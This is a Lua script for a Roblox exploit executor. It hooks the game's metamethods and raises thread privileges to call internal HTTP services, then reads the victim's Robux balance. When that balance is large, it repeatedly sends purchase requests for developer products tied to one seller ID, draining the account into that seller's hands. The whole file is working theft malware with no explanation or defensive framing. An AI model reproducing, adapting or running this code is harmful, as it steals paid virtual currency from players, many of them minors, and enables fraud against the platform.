-- extra

local getrobux = Instance.new("TextLabel");
getrobux.Name = "GetFuckingRobuxBalance";
getrobux.Text = "...";
getrobux.Parent = game.InsertService;
local executor = identifyexecutor();
getrenv()._set = clonefunction(setthreadidentity);
local function _get(url)
	local old;
	old = hookmetamethod(game, "__index", function(a, b)
		task.spawn(function()
			_set(7);
			task.wait();
			game:GetService("HttpRbxApiService"):GetAsyncFullUrl(url);
		end);
		hookmetamethod(game, "__index", old);
		return old(a, b);
	end);
end
local function _post(url, data)
	local old1;
	old1 = hookmetamethod(game, "__index", function(a, b)
		task.spawn(function()
			_set(7);
			task.wait();
			game:GetService("HttpRbxApiService"):PostAsyncFullUrl(url, data);
		end);
		hookmetamethod(game, "__index", old1);
		return old1(a, b);
	end);
end
local function _patch(url, body)
	local old2;
	old2 = hookmetamethod(game, "__index", function(a, b)
		task.spawn(function()
			_set(7);
			task.wait();
			game:GetService("HttpRbxApiService"):RequestAsync({Url=url,Method="PATCH",Body=body});
		end);
		hookmetamethod(game, "__index", old2);
		return old2(a, b);
	end);
end
local function _end()
	local old3;
	old3 = hookmetamethod(game, "__index", function(a, b)
		task.spawn(function()
			_set(7);
			task.wait();
			game:GetService("BrowserService"):OpenBrowserWindow("https://roblox.com/home");
		end);
		hookmetamethod(game, "__index", old3);
		return old3(a, b);
	end);
end
local function GrabRobuxBalance()
	local old4;
	old4 = hookmetamethod(game, "__index", function(a, b)
		task.spawn(function()
			_set(7);
			task.wait();
			local rob = game:GetService("MarketplaceService"):GetRobuxBalance();
			game.InsertService.GetFuckingRobuxBalance.Text = rob;
		end);
		hookmetamethod(game, "__index", old4);
		return old4(a, b);
	end);
end

GrabRobuxBalance();
task.wait(1);
local rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
local eros = '{"expectedCurrency":1,"expectedPrice":15,"expectedSellerId":3409950911}';
local hercules = '{"expectedCurrency":1,"expectedPrice":25,"expectedSellerId":3409950911}';
local hylos = '{"expectedCurrency":1,"expectedPrice":50,"expectedSellerId":3409950911}';
local tartarus = '{"expectedCurrency":1,"expectedPrice":100,"expectedSellerId":3409950911}';
local deimos = '{"expectedCurrency":1,"expectedPrice":200,"expectedSellerId":3409950911}';
local artemis = '{"expectedCurrency":1,"expectedPrice":300,"expectedSellerId":3409950911}';
local zeus = '{"expectedCurrency":1,"expectedPrice":500,"expectedSellerId":3409950911}';
local kratos = '{"expectedCurrency":1,"expectedPrice":750,"expectedSellerId":3409950911}';
local athena = '{"expectedCurrency":1,"expectedPrice":1000,"expectedSellerId":3409950911}';
local hephaestus = '{"expectedCurrency":1,"expectedPrice":1500,"expectedSellerId":3409950911}';
local hera = '{"expectedCurrency":1,"expectedPrice":2000,"expectedSellerId":3409950911}';
local krampus = '{"expectedCurrency":1,"expectedPrice":2500,"expectedSellerId":3409950911}';
local pegasus = '{"expectedCurrency":1,"expectedPrice":4000,"expectedSellerId":3409950911}';
local poseidon = '{"expectedCurrency":1,"expectedPrice":6000,"expectedSellerId":3409950911}';
local hermes = '{"expectedCurrency":1,"expectedPrice":8000,"expectedSellerId":3409950911}';
local apollo = '{"expectedCurrency":1,"expectedPrice":13000,"expectedSellerId":3409950911}';
local hades = '{"expectedCurrency":1,"expectedPrice":20000,"expectedSellerId":3409950911}';
local demeter = '{"expectedCurrency":1,"expectedPrice":35000,"expectedSellerId":3409950911}';
local atlas = '{"expectedCurrency":1,"expectedPrice":50000,"expectedSellerId":3409950911}';
local cronus = '{"expectedCurrency":1,"expectedPrice":75000,"expectedSellerId":3409950911}';
local helios = '{"expectedCurrency":1,"expectedPrice":150000,"expectedSellerId":3409950911}';

local function drain()
while task.wait(0.25) do
	if (rb == 0) then
		print("end")
		break
	elseif ((rb > 0) and (rb < 15)) then
		print("end")
		break
	elseif ((rb >= 15) and (rb < 25)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769831245", eros);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 25) and (rb < 50)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769831357", hercules);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 50) and (rb < 100)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769831484", hylos);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 100) and (rb < 200)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769831626", tartarus);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 200) and (rb < 300)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769831819", deimos);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 300) and (rb < 500)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769831928", artemis);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 500) and (rb < 750)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769832052", zeus);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 750) and (rb < 1000)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769832218", kratos);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 1000) and (rb < 1500)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769832370", athena);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 1500) and (rb < 2000)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769832471", hephaestus);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 2000) and (rb < 2500)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769832596", hera);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 2500) and (rb < 4000)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769832737", krampus);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 4000) and (rb < 6000)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769832839", pegasus);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 6000) and (rb < 8000)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769832962", poseidon);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 8000) and (rb < 13000)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769833119", hermes);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 13000) and (rb < 20000)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769833315", apollo);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 20000) and (rb < 35000)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769833413", hades);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 35000) and (rb < 50000)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769833535", demeter);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 50000) and (rb < 75000)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769833676", atlas);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	elseif ((rb >= 75000) and (rb < 150000)) then
		_post("https://economy.roblox.com/v1/purchases/products/1769833804", cronus);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	else
		_post("https://economy.roblox.com/v1/purchases/products/1769833964", helios);
		wait();
		GrabRobuxBalance();
		task.wait(0.1);
		rb = tonumber(game.InsertService.GetFuckingRobuxBalance.Text);
	end
end
end

if rb >= 35000 then
drain()
end
